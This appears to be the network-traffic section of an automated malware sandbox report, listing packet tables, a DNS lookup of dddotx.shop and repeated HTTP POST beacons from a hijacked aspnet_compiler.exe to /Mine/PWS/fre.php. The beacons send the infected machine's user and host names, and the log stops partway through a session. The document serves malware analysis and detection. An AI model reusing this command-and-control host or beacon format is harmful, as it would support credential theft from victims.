Sep 25, 2024 10:21:03.370904922 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:03.375658035 CEST	80	49833	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.014822960 CEST	80	49833	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.015053034 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.015111923 CEST	80	49833	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.015185118 CEST	49833	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.019902945 CEST	80	49833	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.158212900 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.486525059 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.486735106 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.488882065 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.493710041 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:04.493818045 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:04.498579025 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.131498098 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.131735086 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.132730007 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.132921934 CEST	49834	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.136584997 CEST	80	49834	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.260602951 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.265492916 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.265657902 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.268106937 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.272849083 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.272945881 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.277735949 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.949707985 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.949911118 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.950782061 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:05.950833082 CEST	49835	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:05.954766989 CEST	80	49835	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.088898897 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.093730927 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.094008923 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.096287012 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.101110935 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.101213932 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.106209040 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.745244026 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.745366096 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.745448112 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.747261047 CEST	49836	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.752043009 CEST	80	49836	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.886004925 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.892391920 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.892486095 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.894697905 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.901330948 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:06.901424885 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:06.906593084 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.563296080 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.563865900 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.563957930 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.592628956 CEST	49837	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.597502947 CEST	80	49837	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.838444948 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.843365908 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.843883038 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.851252079 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.856080055 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:07.859251022 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:07.864099979 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:08.545244932 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:08.545522928 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:08.545792103 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:08.545870066 CEST	49838	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:08.550359964 CEST	80	49838	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:08.680654049 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:09.688775063 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:09.933722019 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:09.933737040 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:09.933913946 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:09.936089039 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:09.940920115 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:09.943417072 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:09.948189020 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.666544914 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.666794062 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.666965008 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.670634985 CEST	49839	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.675339937 CEST	80	49839	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.805988073 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.810821056 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.810976028 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.813240051 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.817974091 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:10.818080902 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:10.822830915 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.512902975 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.513057947 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.513513088 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.513587952 CEST	49840	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.517815113 CEST	80	49840	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.658046961 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.663784027 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.663985014 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.669521093 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.674395084 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:11.674439907 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:11.679291964 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.356112957 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.356324911 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.356396914 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.356451988 CEST	49841	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.361140966 CEST	80	49841	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.559189081 CEST	49842	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.564131021 CEST	80	49842	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.564218998 CEST	49842	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.566299915 CEST	49842	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.571078062 CEST	80	49842	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:12.571147919 CEST	49842	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:21:12.575938940 CEST	80	49842	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:13.248045921 CEST	80	49842	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:13.248256922 CEST	80	49842	188.114.97.3	192.168.2.7
Sep 25, 2024 10:21:13.248307943 CEST	49842	80	192.168.2.7	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 10:19:08.181261063 CEST	52523	53	192.168.2.7	1.1.1.1
Sep 25, 2024 10:19:08.194547892 CEST	53	52523	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 10:19:08.181261063 CEST	192.168.2.7	1.1.1.1	0x7b8d	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 10:19:08.194547892 CEST	1.1.1.1	192.168.2.7	0x7b8d	No error (0)	dddotx.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 10:19:08.194547892 CEST	1.1.1.1	192.168.2.7	0x7b8d	No error (0)	dddotx.shop		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:08.206741095 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 192 Connection: close
Sep 25, 2024 10:19:08.211637974 CEST	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk651689FRONTDESK-PCk0FDD42EE188E931437F4FBE2CvlQ9l
Sep 25, 2024 10:19:09.125356913 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t8yz2U2irZoq6Uw3dUjkj78ZEXgG8MnmB9xALizVpWkR%2Fm9vqAsd%2FGudhHg2amd1h76Hv%2FFQ3maCR8loEfHWWrsPf2IzBdgKhiO1TM8W2S4SmEKHdvu4rhyEu%2BxBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89966aded28ce8-EWR Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:09.257600069 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 192 Connection: close
Sep 25, 2024 10:19:09.263458014 CEST	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk651689FRONTDESK-PC+0FDD42EE188E931437F4FBE2CFtHKQ
Sep 25, 2024 10:19:09.982157946 CEST	591	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B2H2c0Gj2uWvet4ViqNJLX2Yk7vZoWpp7RzdBTI8kZBYwxHhoRCOudl3VT3vT0IFa8M5zwG07SPzAGiDhFJbHQVp%2BXVJFYW2UtP2E5aTuCCA2OJPUz%2BiNx1gjG%2Bzcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89967168f01a0f-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:10.058101892 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:10.062927008 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:10.811630011 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2OvSeZZQTmhd75P2XTmwZYodU%2Bl68iqvjz7NIeIFz1rA76YgN73SvxxXjb1%2B15DmR1rjbTH9rRfbWNKCSPsrPjr5uUQWgjwaan7Mn11nDQzivaZQUC8W95fghiLug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996767a458cb4-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49702	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:10.964413881 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:10.969314098 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:11.665431976 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WlhK6sP%2FjGiccxN5WqbMJ7FBrFLcskipZJsHQypob8lx8mwY94fXCU0%2Bzg0m9JyL9WInxHL8HL%2FIcG6YpXj5nDlfdi0TvjpZNJA7v6GW53X%2BhJzRWdkQC9AOWKDkTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89967c1fbe43d9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49703	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:11.832576036 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:11.837774038 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:12.530971050 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=boOSk5iX75iAUOyBOaaWNADScZnIR3oD4BhEaYPKDT5WwvpMQuGiaECNRY4r049k18b7jnIy6akaSEC1DxCWQmvfEQKE%2B9hkM7hsww5HvAYbPxF1gQh%2F08Q3%2BgfIYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899681aa685e5f-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49704	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:12.683944941 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:12.688863993 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:13.452939987 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trQiPC%2BfoJTo3Hf42NuVPNFZ2GNtT6TX6AIXzO021oL5tY3Lf1N3vmKdctmyeuZwnHk0m01wwaI%2FPbVTgXCWYj1JqC0dng4snsXkckUT43xMH2igMHAtVqi3e%2Fcl%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899686cb0f1791-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49705	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:13.608577967 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:13.615421057 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:14.450290918 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cmhbUqd%2FywIijoA3eanxHATHUbXNJ5Ze3GMIvAixoBoM3qA%2FHlrXuFWPOiq6MDSiSQwGGUas%2F8TRYTlfGNnbjpxK7KouFFFSiw1Aogsf4jiBKeYZ%2F8SSZxv%2FD9hUg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89968c8eb90cc2-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49706	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:14.706671953 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:14.711569071 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:15.399228096 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hjf7%2FbhQDeW6ZKrU5IhE4S3b8rSFr22eXuOErInXDBXVF1vNV3S859ZlrN6LeNF%2BShs5Eniv5%2BkKTQf7iV7T0BZNSBzuFeZY8fAgQrKEfwgSj%2BN3zXz7lwR%2FztHs9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89969389c70f5b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49707	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:15.576531887 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:15.581402063 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:16.220118999 CEST	603	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lHAGU87e5ScF5VKOzXAOGbSh%2Fv0%2BC3b88kNJGrDL%2B%2FYP%2BCefGKZC6HQrhY%2BMBAVaCJCmPPvQOXZ18gp6aZWKFXwd1GwCby9clYUWmbSHi5hAkYZOsVRLmljJXBX1bA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899698de2b5e6d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49708	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:16.372112989 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
